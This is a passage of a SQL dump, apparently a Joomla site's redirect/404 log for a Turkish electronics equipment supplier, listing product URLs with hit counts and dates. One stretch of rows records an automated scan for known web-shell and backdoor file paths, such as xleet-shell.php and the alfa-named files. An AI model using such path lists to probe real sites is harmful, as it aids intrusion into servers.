00:00:00',301),(41229,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??',NULL,'','',4,0,'2025-06-27 11:35:06','0000-00-00 00:00:00',301),(41230,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',4,0,'2025-06-27 11:35:11','0000-00-00 00:00:00',301),(41231,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2025-06-27 11:35:14','0000-00-00 00:00:00',301),(41232,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-27 11:35:17','0000-00-00 00:00:00',301),(41233,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',4,0,'2025-06-27 11:35:22','0000-00-00 00:00:00',301),(41234,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name',NULL,'','',3,0,'2025-06-27 11:35:25','0000-00-00 00:00:00',301),(41235,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',4,0,'2025-06-27 11:35:28','0000-00-00 00:00:00',301),(41236,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',3,0,'2025-06-27 11:35:33','0000-00-00 00:00:00',301),(41237,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,category_name?language=en-gb',NULL,'','',5,0,'2025-06-27 11:35:37','0000-00-00 00:00:00',301),(41238,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name',NULL,'','',5,0,'2025-06-27 11:35:40','0000-00-00 00:00:00',301),(41239,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',4,0,'2025-06-27 11:35:43','0000-00-00 00:00:00',301),(41240,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:35:46','0000-00-00 00:00:00',301),(41241,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',4,0,'2025-06-27 11:35:49','0000-00-00 00:00:00',301),(41242,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,ordering',NULL,'','',4,0,'2025-06-27 11:35:54','0000-00-00 00:00:00',301),(41243,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_sku?language=en-gb',NULL,'','',5,0,'2025-06-27 11:35:57','0000-00-00 00:00:00',301),(41244,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/dirdesc',NULL,'','',4,0,'2025-06-27 11:36:00','0000-00-00 00:00:00',301),(41245,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:36:05','0000-00-00 00:00:00',301),(41246,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl???language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:07','0000-00-00 00:00:00',301),(41247,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z',NULL,'','',5,0,'2025-06-27 11:36:10','0000-00-00 00:00:00',301),(41248,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku',NULL,'','',5,0,'2025-06-27 11:36:14','0000-00-00 00:00:00',301),(41249,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc',NULL,'','',5,0,'2025-06-27 11:36:17','0000-00-00 00:00:00',301),(41250,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-27 11:36:20','0000-00-00 00:00:00',301),(41251,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,`p`.product_sku?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:23','0000-00-00 00:00:00',301),(41252,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name',NULL,'','',3,0,'2025-06-27 11:36:25','0000-00-00 00:00:00',301),(41253,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc',NULL,'','',3,0,'2025-06-27 11:36:28','0000-00-00 00:00:00',301),(41254,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:31','0000-00-00 00:00:00',301),(41255,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,category_name?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:33','0000-00-00 00:00:00',301),(41256,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name',NULL,'','',5,0,'2025-06-27 11:36:35','0000-00-00 00:00:00',301),(41257,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc',NULL,'','',5,0,'2025-06-27 11:36:38','0000-00-00 00:00:00',301),(41258,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:40','0000-00-00 00:00:00',301),(41259,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,mf_name?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:42','0000-00-00 00:00:00',301),(41260,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,ordering',NULL,'','',5,0,'2025-06-27 11:36:45','0000-00-00 00:00:00',301),(41261,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,ordering?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:48','0000-00-00 00:00:00',301),(41262,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name',NULL,'','',5,0,'2025-06-27 11:36:51','0000-00-00 00:00:00',301),(41263,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc',NULL,'','',5,0,'2025-06-27 11:36:53','0000-00-00 00:00:00',301),(41264,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:55','0000-00-00 00:00:00',301),(41265,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,pc.ordering,product_name?language=en-gb',NULL,'','',5,0,'2025-06-27 11:36:58','0000-00-00 00:00:00',301),(41266,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name',NULL,'','',5,0,'2025-06-27 11:37:00','0000-00-00 00:00:00',301),(41267,'https://3s-technologies.com.tr/en/wood-processing-ah?ap-i??leme/mdf-i??leme-mdf-processing',NULL,'','',5,0,'2025-06-27 11:37:04','0000-00-00 00:00:00',301),(41268,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-kaz?ma-milling',NULL,'','',5,0,'2025-06-27 11:37:13','0000-00-00 00:00:00',301),(41269,'https://3s-technologies.com.tr/tr/pcb-prototip-prototyping/pcb-y?kseklik-self-levelling',NULL,'','',5,0,'2025-06-27 11:37:16','0000-00-00 00:00:00',301),(41270,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f??n/by,mf_name?language=en-gb',NULL,'','',2,0,'2025-06-27 19:49:44','0000-00-00 00:00:00',301),(41271,'http://3s-technologies.com.tr/en/file-manager/ckeditor',NULL,'','',2,0,'2025-06-28 02:10:57','0000-00-00 00:00:00',301),(41272,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/smd-f?r??n',NULL,'','',1,0,'2025-06-28 04:31:04','0000-00-00 00:00:00',301),(41273,'http://3s-technologies.com.tr/tr/.well-known/iwpairbj.php',NULL,'','',3,0,'2025-06-28 08:03:23','0000-00-00 00:00:00',301),(41274,'http://3s-technologies.com.tr/tr/wp-admin/includes/1975team.php',NULL,'','',3,0,'2025-06-28 08:03:26','0000-00-00 00:00:00',301),(41275,'http://3s-technologies.com.tr/tr/wp-includes/css/core.php',NULL,'','',3,0,'2025-06-28 08:03:32','0000-00-00 00:00:00',301),(41276,'http://3s-technologies.com.tr/tr/wp-content/themes/twentynineteen/inc/ty.php',NULL,'','',3,0,'2025-06-28 08:03:34','0000-00-00 00:00:00',301),(41277,'http://3s-technologies.com.tr/tr/wp-content/uploads/upload_handler.php',NULL,'','',3,0,'2025-06-28 08:03:35','0000-00-00 00:00:00',301),(41278,'http://3s-technologies.com.tr/tr/defense.php',NULL,'','',6,0,'2025-06-28 08:03:35','0000-00-00 00:00:00',301),(41279,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/file.php',NULL,'','',12,0,'2025-06-28 08:03:40','0000-00-00 00:00:00',301),(41280,'http://3s-technologies.com.tr/tr/wp-content/uploads/ethwwuzd.php',NULL,'','',4,0,'2025-06-28 08:03:44','0000-00-00 00:00:00',301),(41281,'http://3s-technologies.com.tr/tr/.well-known/alfanew.php',NULL,'','',3,0,'2025-06-28 08:03:46','0000-00-00 00:00:00',301),(41282,'http://3s-technologies.com.tr/tr/add_class.php',NULL,'','',6,0,'2025-06-28 08:03:46','0000-00-00 00:00:00',301),(41283,'http://3s-technologies.com.tr/tr/wp-includes/widgets/themes.php',NULL,'','',7,0,'2025-06-28 08:03:49','0000-00-00 00:00:00',301),(41284,'http://3s-technologies.com.tr/tr/wp-admin/s7fhimzbug1.php',NULL,'','',3,0,'2025-06-28 08:03:50','0000-00-00 00:00:00',301),(41285,'http://3s-technologies.com.tr/tr/wp-content/sxx.php',NULL,'','',3,0,'2025-06-28 08:03:58','0000-00-00 00:00:00',301),(41286,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/file.php',NULL,'','',4,0,'2025-06-28 08:04:00','0000-00-00 00:00:00',301),(41287,'http://3s-technologies.com.tr/tr/include/lurd.class.php',NULL,'','',3,0,'2025-06-28 08:04:10','0000-00-00 00:00:00',301),(41288,'http://3s-technologies.com.tr/tr/alfa1.php',NULL,'','',6,0,'2025-06-28 08:04:17','0000-00-00 00:00:00',301),(41289,'http://3s-technologies.com.tr/tr/admin/uploads/worksec.php',NULL,'','',3,0,'2025-06-28 08:04:19','0000-00-00 00:00:00',301),(41290,'http://3s-technologies.com.tr/tr/wp-includes/css/admin.php',NULL,'','',14,0,'2025-06-28 08:04:23','0000-00-00 00:00:00',301),(41291,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/gif.php',NULL,'','',3,0,'2025-06-28 08:04:24','0000-00-00 00:00:00',301),(41292,'http://3s-technologies.com.tr/tr/feedback.php',NULL,'','',4,0,'2025-06-28 08:04:24','0000-00-00 00:00:00',301),(41293,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/blue/blkqvmih.php',NULL,'','',3,0,'2025-06-28 08:04:33','0000-00-00 00:00:00',301),(41294,'http://3s-technologies.com.tr/tr/templates/hcapmaster_comps.php',NULL,'','',3,0,'2025-06-28 08:04:35','0000-00-00 00:00:00',301),(41295,'http://3s-technologies.com.tr/tr/.well-known/doc.php',NULL,'','',3,0,'2025-06-28 08:04:35','0000-00-00 00:00:00',301),(41296,'http://3s-technologies.com.tr/tr/wp-admin/includes/xleet-shell.php',NULL,'','',3,0,'2025-06-28 08:04:39','0000-00-00 00:00:00',301),(41297,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/fond.php',NULL,'','',3,0,'2025-06-28 08:04:42','0000-00-00 00:00:00',301),(41298,'http://3s-technologies.com.tr/tr/alfa_data/alfacgiapi/wp-conflg.php',NULL,'','',3,0,'2025-06-28 08:04:43','0000-00-00 00:00:00',301),(41299,'http://3s-technologies.com.tr/tr/wp-includes/wp-includes/admin-bar.php',NULL,'','',3,0,'2025-06-28 08:04:44','0000-00-00 00:00:00',301),(41300,'http://3s-technologies.com.tr/tr/dir.php',NULL,'','',11,0,'2025-06-28 08:04:44','0000-00-00 00:00:00',301),(41301,'http://3s-technologies.com.tr/tr/comdofuns.php',NULL,'','',4,0,'2025-06-28 08:04:45','0000-00-00 00:00:00',301),(41302,'http://3s-technologies.com.tr/tr/wp-includes/customize/class-wp-customize-new-menu-section-compiler.php',NULL,'','',3,0,'2025-06-28 08:04:46','0000-00-00 00:00:00',301),(41303,'http://3s-technologies.com.tr/tr/.well-known/wp-2019.php',NULL,'','',3,0,'2025-06-28 08:04:50','0000-00-00 00:00:00',301),(41304,'http://3s-technologies.com.tr/tr/wp-content/plugins/index-ajax-response.php',NULL,'','',3,0,'2025-06-28 08:04:50','0000-00-00 00:00:00',301),(41305,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/index1.php',NULL,'','',3,0,'2025-06-28 08:04:53','0000-00-00 00:00:00',301),(41306,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/la.php',NULL,'','',14,0,'2025-06-28 08:04:54','0000-00-00 00:00:00',301),(41307,'http://3s-technologies.com.tr/tr/wp/wp-admin/includes/class-wp-filesystem-base.php.bak',NULL,'','',3,0,'2025-06-28 08:04:57','0000-00-00 00:00:00',301),(41308,'http://3s-technologies.com.tr/tr/form.php',NULL,'','',15,0,'2025-06-28 08:05:01','0000-00-00 00:00:00',301),(41309,'http://3s-technologies.com.tr/tr/alfa_data/autoload_classmap.php',NULL,'','',4,0,'2025-06-28 08:05:07','0000-00-00 00:00:00',301),(41310,'http://3s-technologies.com.tr/tr/source.php',NULL,'','',17,0,'2025-06-28 08:05:08','0000-00-00 00:00:00',301),(41311,'http://3s-technologies.com.tr/tr/wp-includes/hnkmhdbj.php',NULL,'','',3,0,'2025-06-28 08:05:09','0000-00-00 00:00:00',301),(41312,'http://3s-technologies.com.tr/tr/liefs.php',NULL,'','',3,0,'2025-06-28 08:05:10','0000-00-00 00:00:00',301),(41313,'http://3s-technologies.com.tr/tr/map.php',NULL,'','',18,0,'2025-06-28 08:05:11','0000-00-00 00:00:00',301),(41314,'http://3s-technologies.com.tr/tr/wp-includes/simplepie/exception-class.php',NULL,'','',3,0,'2025-06-28 08:05:14','0000-00-00 00:00:00',301),(41315,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoo/alfa-rex1.php',NULL,'','',3,0,'2025-06-28 08:05:21','0000-00-00 00:00:00',301),(41316,'http://3s-technologies.com.tr/tr/nav-menus.php',NULL,'','',3,0,'2025-06-28 08:05:25','0000-00-00 00:00:00',301),(41317,'http://3s-technologies.com.tr/tr/uploads/autoload_classmap.php',NULL,'','',59,0,'2025-06-28 08:05:29','0000-00-00 00:00:00',301),(41318,'http://3s-technologies.com.tr/tr/wp-admin/images/dropdown.php',NULL,'','',3,0,'2025-06-28 08:05:29','0000-00-00 00:00:00',301),(41319,'http://3s-technologies.com.tr/tr/docs/cc.php',NULL,'','',3,0,'2025-06-28 08:05:32','0000-00-00 00:00:00',301),(41320,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/alfa-rex.php7',NULL,'','',10,0,'2025-06-28 08:05:37','0000-00-00 00:00:00',301),(41321,'http://3s-technologies.com.tr/tr/js/atomlib.php',NULL,'','',16,0,'2025-06-28 08:05:41','0000-00-00 00:00:00',301),(41322,'http://3s-technologies.com.tr/tr/xp.php',NULL,'','',28,0,'2025-06-28 08:05:51','0000-00-00 00:00:00',301),(41323,'http://3s-technologies.com.tr/tr/upload/duck.php',NULL,'','',3,0,'2025-06-28 08:05:57','0000-00-00 00:00:00',301),(41324,'http://3s-technologies.com.tr/tr/.well-known/acme-challenge/shimo.php',NULL,'','',3,0,'2025-06-28 08:05:59','0000-00-00 00:00:00',301),(41325,'http://3s-technologies.com.tr/tr/class-bulk-skin.php',NULL,'','',3,0,'2025-06-28 08:06:02','0000-00-00 00:00:00',301),(41326,'http://3s-technologies.com.tr/tr/wp-content/plugins/seoo/alfa-ioxi.php',NULL,'','',3,0,'2025-06-28 08:06:10','0000-00-00 00:00:00',301),(41327,'http://3s-technologies.com.tr/tr/edit-tags.php',NULL,'','',28,0,'2025-06-28 08:06:13','0000-00-00 00:00:00',301),(41328,'http://3s-technologies.com.tr/tr/wp-content/uploads/2023/05/404.php',NULL,'','',3,0,'2025-06-28 08:06:22','0000-00-00 00:00:00',301),(41329,'http://3s-technologies.com.tr/tr/wp-includes/customize/123.php',NULL,'','',3,0,'2025-06-28 08:06:25','0000-00-00 00:00:00',301),(41330,'http://3s-technologies.com.tr/tr/.well-known/options.php',NULL,'','',3,0,'2025-06-28 08:06:26','0000-00-00 00:00:00',301),(41331,'http://3s-technologies.com.tr/tr/wp-content/uploads/2014/was-wp.php',NULL,'','',3,0,'2025-06-28 08:06:31','0000-00-00 00:00:00',301),(41332,'http://3s-technologies.com.tr/tr/wp-includes/qqzqflcv.php',NULL,'','',3,0,'2025-06-28 08:06:35','0000-00-00 00:00:00',301),(41333,'http://3s-technologies.com.tr/tr/yanz.php/wp-admin/user/cloud.php',NULL,'','',3,0,'2025-06-28 08:06:37','0000-00-00 00:00:00',301),(41334,'http://3s-technologies.com.tr/tr/payment.php',NULL,'','',4,0,'2025-06-28 08:06:39','0000-00-00 00:00:00',301),(41335,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',1,0,'2025-06-28 10:49:03','0000-00-00 00:00:00',301),(41336,'https://3s-technologies.com.tr/en/akrilik-i?leme-acrylic-processing/akrilik-i??leme-acrylic-processing',NULL,'','',4,0,'2025-06-28 12:46:57','0000-00-00 00:00:00',301),(41337,'http://3s-technologies.com.tr/en/products/lehimleme-malzemeleri/?language=en-gb',NULL,'','',2,0,'2025-06-28 12:47:24','0000-00-00 00:00:00',301),(41338,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name',NULL,'','',4,0,'2025-06-28 12:47:27','0000-00-00 00:00:00',301),(41339,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name/dirdesc',NULL,'','',4,0,'2025-06-28 12:47:29','0000-00-00 00:00:00',301),(41340,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 12:47:31','0000-00-00 00:00:00',301),(41341,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,mf_name?language=en-gb',NULL,'','',4,0,'2025-06-28 12:47:34','0000-00-00 00:00:00',301),(41342,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,ordering',NULL,'','',3,0,'2025-06-28 12:47:36','0000-00-00 00:00:00',301),(41343,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-28 12:48:03','0000-00-00 00:00:00',301),(41344,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_sku',NULL,'','',4,0,'2025-06-28 12:48:15','0000-00-00 00:00:00',301),(41345,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/by,product_sku?language=en-gb',NULL,'','',4,0,'2025-06-28 12:48:17','0000-00-00 00:00:00',301),(41346,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name/dirdesc',NULL,'','',4,0,'2025-06-28 12:48:20','0000-00-00 00:00:00',301),(41347,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 12:48:23','0000-00-00 00:00:00',301),(41348,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-28 12:48:25','0000-00-00 00:00:00',301),(41349,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?language=en-gb',NULL,'','',1,0,'2025-06-28 13:22:48','0000-00-00 00:00:00',301),(41350,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/dirdesc',NULL,'','',4,0,'2025-06-28 13:23:16','0000-00-00 00:00:00',301),(41351,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:23:18','0000-00-00 00:00:00',301),(41352,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,ordering?language=en-gb',NULL,'','',4,0,'2025-06-28 13:23:49','0000-00-00 00:00:00',301),(41353,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name',NULL,'','',4,0,'2025-06-28 13:23:51','0000-00-00 00:00:00',301),(41354,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2025-06-28 13:23:53','0000-00-00 00:00:00',301),(41355,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:23:55','0000-00-00 00:00:00',301),(41356,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,pc.ordering,product_name?language=en-gb',NULL,'','',4,0,'2025-06-28 13:23:57','0000-00-00 00:00:00',301),(41357,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_name',NULL,'','',4,0,'2025-06-28 13:23:59','0000-00-00 00:00:00',301),(41358,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-orta-h?zl??/by,product_sku',NULL,'','',4,0,'2025-06-28 13:24:01','0000-00-00 00:00:00',301),(41359,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc',NULL,'','',5,0,'2025-06-28 13:24:17','0000-00-00 00:00:00',301),(41360,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-28 13:24:18','0000-00-00 00:00:00',301),(41361,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:20','0000-00-00 00:00:00',301),(41362,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_sku',NULL,'','',4,0,'2025-06-28 13:24:22','0000-00-00 00:00:00',301),(41363,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/by,product_sku?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:24','0000-00-00 00:00:00',301),(41364,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:28','0000-00-00 00:00:00',301),(41365,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-h?z?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:30','0000-00-00 00:00:00',301),(41366,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n',NULL,'','',4,0,'2025-06-28 13:24:32','0000-00-00 00:00:00',301),(41367,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku',NULL,'','',4,0,'2025-06-28 13:24:34','0000-00-00 00:00:00',301),(41368,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2025-06-28 13:24:36','0000-00-00 00:00:00',301),(41369,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:38','0000-00-00 00:00:00',301),(41370,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,`p`.product_sku?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:40','0000-00-00 00:00:00',301),(41371,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name',NULL,'','',5,0,'2025-06-28 13:24:42','0000-00-00 00:00:00',301),(41372,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name/dirdesc',NULL,'','',5,0,'2025-06-28 13:24:44','0000-00-00 00:00:00',301),(41373,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:46','0000-00-00 00:00:00',301),(41374,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,category_name?language=en-gb',NULL,'','',5,0,'2025-06-28 13:24:48','0000-00-00 00:00:00',301),(41375,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name',NULL,'','',5,0,'2025-06-28 13:24:50','0000-00-00 00:00:00',301),(41376,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name/dirdesc',NULL,'','',5,0,'2025-06-28 13:24:51','0000-00-00 00:00:00',301),(41377,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:24:53','0000-00-00 00:00:00',301),(41378,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,mf_name?language=en-gb',NULL,'','',5,0,'2025-06-28 13:24:55','0000-00-00 00:00:00',301),(41379,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name',NULL,'','',4,0,'2025-06-28 13:24:58','0000-00-00 00:00:00',301),(41380,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name/dirdesc',NULL,'','',4,0,'2025-06-28 13:25:00','0000-00-00 00:00:00',301),(41381,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:25:01','0000-00-00 00:00:00',301),(41382,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,pc.ordering,product_name?language=en-gb',NULL,'','',4,0,'2025-06-28 13:25:03','0000-00-00 00:00:00',301),(41383,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name',NULL,'','',4,0,'2025-06-28 13:25:06','0000-00-00 00:00:00',301),(41384,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name/dirdesc',NULL,'','',5,0,'2025-06-28 13:25:08','0000-00-00 00:00:00',301),(41385,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-28 13:25:10','0000-00-00 00:00:00',301),(41386,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/by,product_name?language=en-gb',NULL,'','',4,0,'2025-06-28 13:25:12','0000-00-00 00:00:00',301),(41387,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/dirdesc',NULL,'','',4,0,'2025-06-28 13:25:14','0000-00-00 00:00:00',301),(41388,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-28 13:25:16','0000-00-00 00:00:00',301),(41389,'http://3s-technologies.com.tr/en/products/manufacturer/smd-f?r??n?language=en-gb',NULL,'','',5,0,'2025-06-28 13:25:18','0000-00-00 00:00:00',301),(41390,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??',NULL,'','',5,0,'2025-06-28 13:25:20','0000-00-00 00:00:00',301),(41391,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku',NULL,'','',5,0,'2025-06-28 13:25:23','0000-00-00 00:00:00',301),(41392,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku/dirdesc',NULL,'','',4,0,'2025-06-28 13:25:25','0000-00-00 00:00:00',301),(41393,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',5,0,'2025-06-28 13:25:26','0000-00-00 00:00:00',301),(41394,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,`p`.product_sku?language=en-gb',NULL,'','',5,0,'2025-06-28 13:25:28','0000-00-00 00:00:00',301),(41395,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name',NULL,'','',5,0,'2025-06-28 13:25:30','0000-00-00 00:00:00',301),(41396,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name/dirdesc',NULL,'','',4,0,'2025-06-28 13:25:32','0000-00-00 00:00:00',301),(41397,'http://3s-technologies.com.tr/en/products/manufacturer/smd-orta-h?zl??/by,category_name/dirdesc?language=en-gb',NULL,'','',4,0,'2025-06-28 13:25:34','0000-00-00 